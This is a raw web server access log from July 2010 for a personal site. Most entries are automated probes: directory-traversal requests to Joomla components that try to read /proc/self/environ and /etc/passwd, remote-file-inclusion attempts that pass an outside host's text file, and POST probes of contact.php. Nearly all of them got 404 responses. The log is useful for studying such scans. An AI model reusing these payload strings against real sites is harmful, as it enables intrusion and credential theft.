91.121.5.196 - - [29/Jul/2010:06:16:47 -0700] "GET /logs/access_100628.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:16:47 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:16:48 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
211.169.249.251 - - [29/Jul/2010:06:16:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
211.169.249.251 - - [29/Jul/2010:06:16:53 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
211.169.249.251 - - [29/Jul/2010:06:16:53 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:16:58 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:16:58 -0700] "GET /logs/access_100720.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:16:58 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:17:03 -0700] "GET /logs/access_100628.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:17:03 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:17:03 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:17:30 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:17:44 -0700] "GET /logs/access_100720.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:17:45 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:17:45 -0700] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:18:15 -0700] "GET /logs/access_100721.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:06:18:50 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:06:19:10 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:06:19:12 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:06:19:17 -0700] "POST /logs/access_100624.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:19:27 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:21:04 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:21:04 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:21:04 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:21:26 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:21:26 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:06:21:26 -0700] "POST /logs/access_100716.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:21:34 -0700] "GET /logs/access_100628.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:21:34 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:21:34 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:22:25 -0700] "GET /logs/access_100721.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
67.159.44.97 - - [29/Jul/2010:06:23:42 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.159.44.97 - - [29/Jul/2010:06:23:42 -0700] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.159.44.97 - - [29/Jul/2010:06:23:42 -0700] "GET /logs/access_100426.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.159.44.97 - - [29/Jul/2010:06:23:57 -0700] "GET /logs/access_100524.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:24:23 -0700] "GET /logs/access_100628.log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:24:23 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:24:24 -0700] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:24:59 -0700] "GET /logs/access_100628.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:24:59 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:24:59 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:25:04 -0700] "GET /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:25:05 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:25:05 -0700] "GET /logs/access_100426.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
93.232.210.134 - - [29/Jul/2010:06:25:22 -0700] "GET /logs/access_100524.log%20%20//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:25:31 -0700] "GET /logs/access_100720.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:25:31 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:25:31 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:27:37 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:06:27:57 -0700] "GET /Stripes/?D=A HTTP/1.0" 200 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:28:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:28:42 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:28:45 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:06:28:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:06:28:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:06:28:57 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:29:16 -0700] "GET /logs/access_100721.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:29:18 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:29:18 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:29:19 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:29:19 -0700] "GET /logs/access_100719.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:30:12 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:30:27 -0700] "GET /logs/access_100716.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:30:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:30:28 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:30:42 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:30:43 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:30:43 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:31:09 -0700] "GET /logs/access_100629.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:31:12 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:31:48 -0700] "GET /logs/access_100719.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:06:32:16 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:06:32:16 -0700] "GET /blog/index.php/2006/08/15/south-asia-images/ HTTP/1.0" 200 6636 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:06:32:29 -0700] "GET /wp-content/themes/default/style.css HTTP/1.0" 404 - "http://sonyafatah.com/blog/2006/08/15/south-asia-images/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:06:32:19 -0700] "GET /wp-content/plugins/falbum/falbum.css HTTP/1.0" 404 - "http://sonyafatah.com/blog/2006/08/15/south-asia-images/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:32:29 -0700] "GET /logs/access_100719.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:32:49 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:32:50 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:32:50 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:33:30 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:34:01 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:34:01 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:34:01 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:34:18 -0700] "GET /logs/access_100704.log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:34:18 -0700] "GET /logs/access_100715.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:34:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.168.176.11 - - [29/Jul/2010:06:34:30 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:06:34:38 -0700] "GET /logs/access_100629.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:34:40 -0700] "GET /logs/access_100719.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:06:35:21 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:36:42 -0700] "GET /logs/access_100719.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:36:57 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:36:57 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:36:57 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:37:07 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:06:37:09 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:06:37:09 -0700] "GET /blog/?p=1 HTTP/1.0" 200 10001 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:37:25 -0700] "GET /logs/access_100720.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:37:26 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:37:26 -0700] "GET /logs//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:06:37:48 -0700] "GET /logs/access_100629.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:38:02 -0700] "GET /logs/access_100719.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:38:02 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:38:02 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:06:39:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:06:39:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:06:39:28 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
91.121.5.196 - - [29/Jul/2010:06:39:37 -0700] "GET /logs/access_100721.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:06:39:58 -0700] "GET /logs/access_100718.log//index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
113.11.200.195 - - [29/Jul/2010:06:42:10 -0700] "GET /logs/access_100721.log//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
113.11.200.195 - - [29/Jul/2010:06:42:11 -0700] "GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
113.11.200.195 - - [29/Jul/2010:06:42:12 -0700] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:42:43 -0700] "GET /logs/access_100628.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:42:43 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:42:44 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:43:01 -0700] "GET /logs/access_100628.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:43:01 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
200.6.154.127 - - [29/Jul/2010:06:43:01 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:43:51 -0700] "GET /logs/access_100719.log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:06:43:52 -0700] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
